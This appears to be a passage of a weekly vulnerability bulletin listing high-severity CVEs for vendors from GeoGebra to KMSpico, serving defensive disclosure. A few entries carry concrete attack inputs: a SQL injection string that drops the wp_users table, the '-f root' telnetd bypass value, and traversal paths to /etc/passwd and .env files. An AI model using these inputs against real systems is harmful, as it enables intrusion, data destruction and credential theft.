| GeoGebra--CAS Calculator | GeoGebra CAS Calculator 6.0.631.0 contains a denial of service vulnerability that allows attackers to crash the application by generating a large buffer overflow. Attackers can create a payload with 8000 repeated characters and paste it into the calculator's input field to trigger an application crash. | 2026-01-21 | 9.8 | CVE-2021-47875 | ExploitDB-49655 GeoGebra Official Homepage VulnCheck Advisory: GeoGebra CAS Calculator 6.0.631.0 - Denial of Service |
| GeoGebra--GeoGebra Classic | GeoGebra Classic 5.0.631.0-d contains a denial of service vulnerability in the input field that allows attackers to crash the application by sending oversized buffer content. Attackers can generate a large buffer of 800,000 repeated characters and paste it into the 'Entrada:' input field to trigger an application crash. | 2026-01-21 | 7.5 | CVE-2021-47876 | ExploitDB-49654 Official Vendor Homepage VulnCheck Advisory: GeoGebra Classic 5.0.631.0-d - Denial of Service |
| GeoGebra--GeoGebra Graphing Calculator | GeoGebra Graphing Calculator 6.0.631.0 contains a denial of service vulnerability that allows attackers to crash the application by inputting an oversized buffer. Attackers can generate a payload of 8000 repeated characters to overwhelm the input field and cause the application to become unresponsive. | 2026-01-21 | 7.5 | CVE-2021-47877 | ExploitDB-49653 GeoGebra Official Homepage VulnCheck Advisory: GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service |
| getwpfunnels--Creator LMS The LMS for Creators, Coaches, and Trainers | The Creator LMS - The LMS for Creators, Coaches, and Trainers plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in the get_items_permissions_check function in all versions up to, and including, 1.1.12. This makes it possible for authenticated attackers, with contributor level access and above, to update arbitrary WordPress options. | 2026-01-20 | 8.8 | CVE-2025-15347 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4bddaefc-9ddc-4798-acb6-7b87f7c924a1?source=cve https://plugins.trac.wordpress.org/changeset/3433193/creatorlms/tags/1.1.13/includes/Rest/V1/SettingsController.php |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 11.9 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to create a denial of service condition by sending crafted requests with malformed authentication data. | 2026-01-22 | 7.5 | CVE-2025-13927 | GitLab Issue #582737 HackerOne Bug Bounty Report #3439683 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.7 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an unauthenticated user to cause a denial of service condition by exploiting incorrect authorization validation in API endpoints. | 2026-01-22 | 7.5 | CVE-2025-13928 | GitLab Issue #582736 HackerOne Bug Bounty Report #3439441 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 that could have allowed an individual with existing knowledge of a victim's credential ID to bypass two-factor authentication by submitting forged device responses. | 2026-01-22 | 7.4 | CVE-2026-0723 | GitLab Issue #585333 HackerOne Bug Bounty Report #3476052 https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/ |
| GNU--Inetutils | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable. | 2026-01-21 | 9.8 | CVE-2026-24061 | https://www.openwall.com/lists/oss-security/2026/01/20/2 https://www.openwall.com/lists/oss-security/2026/01/20/8 https://www.gnu.org/software/inetutils/ |
| gristlabs--grist-core | Grist is spreadsheet software using Python as its formula language. Grist offers several methods for running those formulas in a sandbox, for cases where the user may be working with untrusted spreadsheets. One such method runs them in pyodide, but pyodide on node does not have a useful sandbox barrier. If a user of Grist sets `GRIST_SANDBOX_FLAVOR` to `pyodide` and opens a malicious document, that document could run arbitrary processes on the server hosting Grist. The problem has been addressed in Grist version 1.7.9 and up, by running pyodide under deno. As a workaround, a user can use the gvisor-based sandbox by setting `GRIST_SANDBOX_FLAVOR` to `gvisor`. | 2026-01-22 | 9.1 | CVE-2026-24002 | https://github.com/gristlabs/grist-core/security/advisories/GHSA-7xvx-8pf2-pv5g https://support.getgrist.com/self-managed/#how-do-i-sandbox-documents |
| gunthercox--ChatterBot | ChatterBot is a machine learning, conversational dialog engine for creating chat bots. ChatterBot versions up to 1.2.10 are vulnerable to a denial-of-service condition caused by improper database session and connection pool management. Concurrent invocations of the get_response() method can exhaust the underlying SQLAlchemy connection pool, resulting in persistent service unavailability and requiring a manual restart to recover. Version 1.2.11 fixes the issue. | 2026-01-19 | 7.5 | CVE-2026-23842 | https://github.com/gunthercox/ChatterBot/security/advisories/GHSA-v4w8-49pv-mf72 https://github.com/gunthercox/ChatterBot/pull/2432 https://github.com/gunthercox/ChatterBot/commit/de89fe648139f8eeacc998ad4524fab291a378cf https://github.com/gunthercox/ChatterBot/releases/tag/1.2.11 https://github.com/user-attachments/assets/4ee845c4-b847-4854-84ec-4b2fb2f7090f |
| h2o--quicly | Quicly, an IETF QUIC protocol implementation, is susceptible to a denial-of-service attack prior to commit d9d3df6a8530a102b57d840e39b0311ce5c9e14e. A remote attacker can exploit these bugs to trigger an assertion failure that crashes the process using Quicly. Commit d9d3df6a8530a102b57d840e39b0311ce5c9e14e fixes the issue. | 2026-01-19 | 7.5 | CVE-2025-61684 | https://github.com/h2o/quicly/security/advisories/GHSA-wr3c-345m-43v9 https://github.com/h2o/quicly/commit/d9d3df6a8530a102b57d840e39b0311ce5c9e14e |
| HackUCF--OnboardLite | OnboardLite is a comprehensive membership lifecycle platform built for student organizations at the University of Central Florida. Versions of the software prior to commit 1d32081a66f21bcf41df1ecb672490b13f6e429f have a stored cross-site scripting vulnerability that can be rendered to an admin when they attempt to migrate a user's discord account in the dashboard. Commit 1d32081a66f21bcf41df1ecb672490b13f6e429f patches the issue. | 2026-01-19 | 7.3 | CVE-2026-23880 | https://github.com/HackUCF/OnboardLite/security/advisories/GHSA-93w8-83cg-h89g https://github.com/HackUCF/OnboardLite/commit/1d32081a66f21bcf41df1ecb672490b13f6e429f |
| HAMASTAR Technology--MeetingHub | MeetingHub developed by HAMASTAR Technology has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Absolute Path Traversal to download arbitrary system files. | 2026-01-22 | 7.5 | CVE-2026-1330 | https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html |
| Hasura--GraphQL | Hasura GraphQL 1.3.3 contains a remote code execution vulnerability that allows attackers to execute arbitrary shell commands through SQL query manipulation. Attackers can inject commands into the run_sql endpoint by crafting malicious GraphQL queries that execute system commands through PostgreSQL's COPY FROM PROGRAM functionality. | 2026-01-21 | 9.8 | CVE-2021-47748 | ExploitDB-49802 Hasura GraphQL Engine GitHub Repository VulnCheck Advisory: Hasura GraphQL 1.3.3 - Remote Code Execution |
| Hestia Control Panel--Hestia Control Panel | Hestia Control Panel 1.3.2 contains an arbitrary file write vulnerability that allows authenticated attackers to write files to arbitrary locations using the API index.php endpoint. Attackers can exploit the v-make-tmp-file command to write SSH keys or other content to specific file paths on the server. | 2026-01-21 | 8.8 | CVE-2021-47871 | ExploitDB-49667 Hestia Control Panel Official Homepage Hestia Control Panel GitHub Repository VulnCheck Advisory: Hestia Control Panel 1.3.2 - Arbitrary File Write |
| HI-REZ STUDIOS--HiPatchService | Hi-Rez Studios 5.1.6.3 contains an unquoted service path vulnerability in the HiPatchService that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path during system startup or reboot to inject and run malicious executables with LocalSystem permissions. | 2026-01-21 | 7.8 | CVE-2021-47862 | ExploitDB-49701 Hi-Rez Studios Official Homepage VulnCheck Advisory: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path |
| Hibernate--Hibernate | A flaw was found in Hibernate. A remote attacker with low privileges could exploit a second-order SQL injection vulnerability by providing specially crafted, unsanitized non-alphanumeric characters in the ID column when the InlineIdsOrClauseBuilder is used. This could lead to sensitive information disclosure, such as reading system files, and allow for data manipulation or deletion within the application's database, resulting in an application level denial of service. | 2026-01-23 | 8.3 | CVE-2026-0603 | https://access.redhat.com/security/cve/CVE-2026-0603 RHBZ#2427147 |
| HID Global--ActivIdentity | ActivIdentity 8.2 contains an unquoted service path vulnerability in the ac.sharedstore service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path in C:\Program Files\Common Files\ActivIdentity\ to inject malicious executables and escalate privileges. | 2026-01-21 | 7.8 | CVE-2021-47859 | ExploitDB-49703 HID Global Official Website VulnCheck Advisory: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path |
| Honeywell--WIN-PACK PRO | WIN-PACK PRO 4.8 contains an unquoted service path vulnerability in the GuardTourService that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path in C:\Program Files <x86>\WINPAKPRO\WP GuardTour Service.exe to inject malicious code that would execute during service startup. | 2026-01-21 | 7.8 | CVE-2021-47866 | ExploitDB-49690 Honeywell Product Webpage VulnCheck Advisory: WIN-PACK PRO 4.8 - 'GuardTourService' Unquoted Service Path |
| Honeywell--WIN-PACK PRO | WIN-PACK PRO 4.8 contains an unquoted service path vulnerability in the WPCommandFileService that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe to inject malicious code that would execute with LocalSystem permissions. | 2026-01-21 | 7.8 | CVE-2021-47868 | ExploitDB-49692 Honeywell Product Webpage VulnCheck Advisory: WIN-PACK PRO 4.8 - 'WPCommandFileService' Unquoted Service Path |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). In version 1.4.0, the OTP handling logic has a flawed equality check that can be bypassed. When an OTP expires, the server returns None, and if an attacker omits the otp field from their POST request, the user-supplied OTP is also None, causing the comparison user_otp == otp to pass. This allows an attacker to bypass two-factor authentication entirely without ever providing a valid OTP. If administrative accounts are targeted, it could lead to compromise of sensitive HR data, manipulation of employee records, and further system-wide abuse. This issue has been fixed in version 1.5.0. | 2026-01-22 | 8.1 | CVE-2026-24038 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-hqpv-ff5v-3hwf https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| HTC--IPTInstaller | HTC IPTInstaller 4.0.9 contains an unquoted service path vulnerability in the PassThru Service configuration. Attackers can exploit the unquoted binary path to inject and execute malicious code with elevated LocalSystem privileges. | 2026-01-25 | 7.8 | CVE-2020-36933 | ExploitDB-49006 HTC Official Latin America Homepage VulnCheck Advisory: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path |
| hwk-fr--Advanced Custom Fields: Extended | The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 0.9.2.1. This is due to the 'insert_user' function not restricting the roles with which a user can register. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. Note: The vulnerability can only be exploited if 'role' is mapped to the custom field. | 2026-01-20 | 9.8 | CVE-2025-14533 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d44f8af2-3525-4b00-afa8-a908250cc838?source=cve https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.1/includes/modules/form/module-form-action-user.php#L636 https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/fields/field-user-roles.php#L437 https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-action-user.php#L356 |
| I Want Source Codes--Digital Crime Report Management System | Digital Crime Report Management System 1.0 contains a critical SQL injection vulnerability affecting multiple login pages that allows unauthenticated attackers to bypass authentication. Attackers can exploit the vulnerability by sending crafted SQL injection payloads in email and password parameters across police, incharge, user, and HQ login endpoints. | 2026-01-21 | 8.2 | CVE-2021-47846 | ExploitDB-49761 Vendor Homepage Software Download Link VulnCheck Advisory: Digital Crime Report Management System 1.0 - SQL Injection |
| ibericode--koko-analytics | Koko Analytics is an open-source analytics plugin for WordPress. Versions prior to 2.1.3 are vulnerable to arbitrary SQL execution through unescaped analytics export/import and permissive admin SQL import. Unauthenticated visitors can submit arbitrary path (`pa`) and referrer (`r`) values to the public tracking endpoint in src/Resources/functions/collect.php, which stores those strings verbatim in the analytics tables. The admin export logic in src/Admin/Data_Export.php writes these stored values directly into SQL INSERT statements without escaping. A crafted path such as "),('999','x');DROP TABLE wp_users;-- breaks out of the value list. When an administrator later imports that export file, the import handler in src/Admin/Data_Import.php reads the uploaded SQL with file_get_contents, performs only a superficial header check, splits on semicolons, and executes each statement via $wpdb->query with no validation of table names or statement types. Additionally, any authenticated user with manage_koko_analytics can upload an arbitrary .sql file and have it executed in the same permissive way. Combined, attacker-controlled input flows from the tracking endpoint into exported SQL and through the import execution sink, or directly via malicious uploads, enabling arbitrary SQL execution. In a worst-case scenario, attackers can achieve arbitrary SQL execution on the WordPress database, allowing deletion of core tables (e.g., wp_users), insertion of backdoor administrator accounts, or other destructive/privilege-escalating actions. Version 2.1.3 patches the issue. | 2026-01-19 | 8.4 | CVE-2026-22850 | https://github.com/ibericode/koko-analytics/security/advisories/GHSA-jgfh-264m-xh3q https://github.com/ibericode/koko-analytics/commit/7b7d58f4a1838c8203cf4e7bb59847c982432119 https://drive.google.com/file/d/1HdQKf42prwrBUUG2CwbIkccTp2i6HR6d/view?usp=sharing |
| IBM--ApplinX | IBM ApplinX 11.1 contains a privilege escalation vulnerability caused by improper verification of JWT tokens. An attacker may be able to craft or modify a JSON web token in order to impersonate another user or to elevate their privileges. | 2026-01-20 | 7.3 | CVE-2025-36418 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 is vulnerable to malicious file upload by not validating the content of the file uploaded to the web interface. | 2026-01-20 | 8.8 | CVE-2025-33015 | https://www.ibm.com/support/pages/node/7257006 |
| IBM--IBM Licensing Operator | IBM Licensing Operator incorrectly assigns privileges to security critical files which could allow a local root escalation inside a container running the IBM Licensing Operator image. | 2026-01-20 | 8.4 | CVE-2025-12985 | https://www.ibm.com/support/pages/license-service-privilege-escalation-vulnerability |
| IBM--Sterling Connect:Direct for UNIX Container | IBM Sterling Connect:Direct for UNIX Container 6.3.0.0 through 6.3.0.6 Interim Fix 016, and 6.4.0.0 through 6.4.0.3 Interim Fix 019, contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | 2026-01-20 | 8.4 | CVE-2025-14115 | https://www.ibm.com/support/pages/node/7257143 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2-13 and 6.9.13-38, a heap buffer overflow vulnerability in the XBM image decoder (ReadXBMImage) allows an attacker to write controlled data past the allocated heap buffer when processing a maliciously crafted image file. Any operation that reads or identifies an image can trigger the overflow, making it exploitable via common image upload and processing pipelines. Versions 7.1.2-13 and 6.9.13-38 fix the issue. | 2026-01-20 | 8.1 | CVE-2026-23876 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r49w-jqq3-3gx8 https://github.com/ImageMagick/ImageMagick/commit/2fae24192b78fdfdd27d766fd21d90aeac6ea8b8 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccMpeCalculator::Read(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 8.8 | CVE-2026-24405 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-2r5c-5w66-47vv https://github.com/InternationalColorConsortium/iccDEV/issues/479 https://github.com/InternationalColorConsortium/iccDEV/commit/d22fc174866e2521f8a5f9393fab5be306329f62 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 8.8 | CVE-2026-24406 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-h9h3-45cm-j95f https://github.com/InternationalColorConsortium/iccDEV/issues/480 https://github.com/InternationalColorConsortium/iccDEV/commit/90c71cba2c563b1f5dc84197f827540d1baaea67 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 8.8 | CVE-2026-24412 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-6rf4-63j2-cfrf https://github.com/InternationalColorConsortium/iccDEV/issues/518 https://github.com/InternationalColorConsortium/iccDEV/commit/2be3b125933a57fe8b6624e9dfd69d8e5360bf70 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, an integer overflow vulnerability exists in icValidateStatus CIccProfile::CheckHeader() when user-controllable input is incorporated into profile data unsafely. Tampering with tag tables, offsets, or size fields can trigger parsing errors, memory corruption, or DoS, potentially enabling arbitrary Code Execution or bypassing application logic. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24403 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-ph33-qp8j-5q34 https://github.com/InternationalColorConsortium/iccDEV/issues/505 https://github.com/InternationalColorConsortium/iccDEV/commits/d993997005449a0a6958e65b057bd25e17dff89 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, CIccXmlArrayType() contains a Null Pointer Dereference and Undefined Behavior vulnerability. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24404 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hqfg-45jp-hp9f https://github.com/InternationalColorConsortium/iccDEV/issues/488 https://github.com/InternationalColorConsortium/iccDEV/commit/cd637eb33f0c8055fa54d8776e00555d3d39ef0c |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior in icSigCalcOp(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24407 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-m6gx-93cp-4855 https://github.com/InternationalColorConsortium/iccDEV/issues/481 https://github.com/InternationalColorConsortium/iccDEV/commit/881802931a71c4b0dfc28bc80ee55b2cb84dab90 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior and Null Pointer Dereference in CIccTagXmlFloatNum<>::ParseXml(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24409 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-398v-jvcg-p8f3 https://github.com/InternationalColorConsortium/iccDEV/issues/484 https://github.com/InternationalColorConsortium/iccDEV/commit/9f134c44895edd2edca4bcb97e15c0ba9aa77382 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior and Null Pointer Dereference in CIccProfileXml::ParseBasic(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24410 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-398q-4rpv-3v9r https://github.com/InternationalColorConsortium/iccDEV/issues/507 https://github.com/InternationalColorConsortium/iccDEV/commit/3cf522b13832692b107322cd51c4ae5c3a21f366 |
| InternationalColorConsortium--iccDEV | iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior in CIccTagXmlSegmentedCurve::ToXml(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2. | 2026-01-24 | 7.1 | CVE-2026-24411 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-x53f-7h27-9fc8 https://github.com/InternationalColorConsortium/iccDEV/issues/499 https://github.com/InternationalColorConsortium/iccDEV/commit/d6d6f51a999d4266ec09347cac7e0930d6e02eec |
| irisideatechsolutions--Kalrav AI Agent | The Kalrav AI Agent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the kalrav_upload_file AJAX action in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-01-24 | 9.8 | CVE-2025-13374 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5dc8feae-fc89-4152-b9b2-2b70e6ccb30b?source=cve https://plugins.trac.wordpress.org/browser/kalrav-ai-agent/trunk/kalrav-ai-agent.php#L967 https://plugins.trac.wordpress.org/browser/kalrav-ai-agent/tags/2.3.3/kalrav-ai-agent.php#L967 https://github.com/d0n601/CVE-2025-13374 https://ryankozak.com/posts/cve-2025-13374 |
| isaacs--node-tar | node-tar, a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3, due to incomplete handling of Unicode path collisions in the `path-reservations` system. The library uses `PathReservations` to serialize the metadata checks and file operations for any given path, so that one entry cannot clobber another concurrently. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, on which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits symlink poisoning via race conditions, i.e. arbitrary file overwrite. Because the reservations use `NFD` Unicode normalization (under which `ß` and `ss` are different), conflicting paths do not have their order preserved on filesystems that ignore Unicode normalization (e.g., APFS, on which `ß` causes an inode collision with `ss`), so an attacker can circumvent the `PathReservations` locks with conflicting filenames inside a malicious tar archive. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behaviour (e.g., `NFKD`), followed first by `toLocaleLowerCase('en')` and then by `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly and who programmatically use `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this entry-name collision issue. | 2026-01-20 | 8.8 | CVE-2026-23950 | https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6 |
| ISC--BIND 9 | Malformed BRID/HHIT records can cause `named` to terminate unexpectedly. This issue affects BIND 9 versions 9.18.40 through 9.18.43, 9.20.13 through 9.20.17, 9.21.12 through 9.21.16, 9.18.40-S1 through 9.18.43-S1, and 9.20.13-S1 through 9.20.17-S1. | 2026-01-21 | 7.5 | CVE-2025-13878 | CVE-2025-13878 https://downloads.isc.org/isc/bind9/9.18.44 https://downloads.isc.org/isc/bind9/9.20.18 https://downloads.isc.org/isc/bind9/9.21.17 |
| itsourcecode--Online Frozen Foods Ordering System | An SQL injection vulnerability has been identified in itsourcecode Online Frozen Foods Ordering System 1.0 in an unknown function of the file /order_online.php: manipulation of the product_name argument leads to SQL injection. The attack can be launched remotely, and a public exploit is available. | 2026-01-19 | 7.3 | CVE-2026-1159 | VDB-341753; itsourcecode Online Frozen Foods Ordering System order_online.php sql injection (VDB-341753); CTI Indicators (IOB, IOC, TTP, IOA); Submit #736332: itsourcecode Online Frozen Foods Ordering System V1.0 SQL Injection https://github.com/YouSeeYouOneDayDayDe/Nick_1321_vuls/issues/1 https://itsourcecode.com/ |
| itsourcecode--School Management System | An SQL injection vulnerability has been discovered in itsourcecode School Management System 1.0 in an unknown function of the file /subject/index.php: manipulation of the ID argument leads to SQL injection. The attack can be initiated remotely, and a public exploit is available. | 2026-01-19 | 7.3 | CVE-2026-1176 | VDB-341770; itsourcecode School Management System index.php sql injection (VDB-341770); CTI Indicators (IOB, IOC, TTP, IOA); Submit #736477: itsourcecode School Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/32 https://itsourcecode.com/ |
| jaraco--jaraco.context | jaraco.context, an open-source software package that provides some useful decorators and context managers, has a Zip Slip path traversal vulnerability in the `jaraco.context.tarball()` function starting in version 5.2.0 and prior to version 6.1.0. The vulnerability may allow attackers to extract files outside the intended extraction directory when malicious tar archives are processed. The strip_first_component filter splits the path on the first `/` and extracts the second component, while allowing `../` sequences. Paths like `dummy_dir/../../etc/passwd` become `../../etc/passwd`. Note that this suffers from a nested tarball attack as well with multi-level tar files such as `dummy_dir/inner.tar.gz`, where the inner.tar.gz includes a traversal `dummy_dir/../../config/.env` that also gets translated to `../../config/.env`. Version 6.1.0 contains a patch for the issue. | 2026-01-20 | 8.6 | CVE-2026-23949 | https://github.com/jaraco/jaraco.context/security/advisories/GHSA-58pv-8j8x-9vj2 https://github.com/jaraco/jaraco.context/commit/7b26a42b525735e4085d2e994e13802ea339d5f9 https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91 https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76 |
| JNC--IAQS | IAQS and I6 developed by JNC has a Client-Side Enforcement of Server-Side Security vulnerability, allowing unauthenticated remote attackers to gain administrator privileges by manipulating the web front-end. | 2026-01-23 | 9.8 | CVE-2026-1363 | https://www.twcert.org.tw/tw/cp-132-10652-4cdca-1.html https://www.twcert.org.tw/en/cp-139-10653-117a1-2.html |
| JNC--IAQS | IAQS and I6 developed by JNC has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to directly operate system administrative functionalities. | 2026-01-23 | 9.8 | CVE-2026-1364 | https://www.twcert.org.tw/tw/cp-132-10652-4cdca-1.html https://www.twcert.org.tw/en/cp-139-10653-117a1-2.html |
| JuneAndGreen--sm-crypto | sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A private key recovery vulnerability exists in the SM2 decryption logic of sm-crypto prior to version 0.3.14. By interacting with the SM2 decryption interface multiple times, an attacker can fully recover the private key within approximately several hundred interactions. Version 0.3.14 patches the issue. | 2026-01-22 | 9.1 | CVE-2026-23966 | https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-pgx9-497m-6c4v https://github.com/JuneAndGreen/sm-crypto/commit/b1c824e58fdf1eaa73692c124a095819a8c45707 |
| JuneAndGreen--sm-crypto | sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A signature forgery vulnerability exists in the SM2 signature verification logic of sm-crypto prior to version 0.4.0. Under default configurations, an attacker can forge valid signatures for arbitrary public keys. If the message space contains sufficient redundancy, the attacker can fix the prefix of the message associated with the forged signature to satisfy specific formatting requirements. Version 0.4.0 patches the issue. | 2026-01-22 | 7.5 | CVE-2026-23965 | https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-hpwg-xg7m-3p6m https://github.com/JuneAndGreen/sm-crypto/commit/85295a859d0766222d12ce2be3e6fce7b438b510 |
| JuneAndGreen--sm-crypto | sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A signature malleability vulnerability exists in the SM2 signature verification logic of the sm-crypto library prior to version 0.3.14. An attacker can derive a new valid signature for a previously signed message from an existing signature. Version 0.3.14 patches the issue. | 2026-01-22 | 7.5 | CVE-2026-23967 | https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-qv7w-v773-3xqm |
| KMSpico--Service KMSELDI | KMSpico 17.1.0.0 contains an unquoted service path vulnerability in the Service KMSELDI configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path in C:\Program Files\KMSpico\Service_KMS.exe to inject malicious executables and escalate privileges. | 2026-01-25 | 7.8 | CVE-2020-36935 | ExploitDB-49003 Official KMSpico Homepage VulnCheck Advisory: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path |
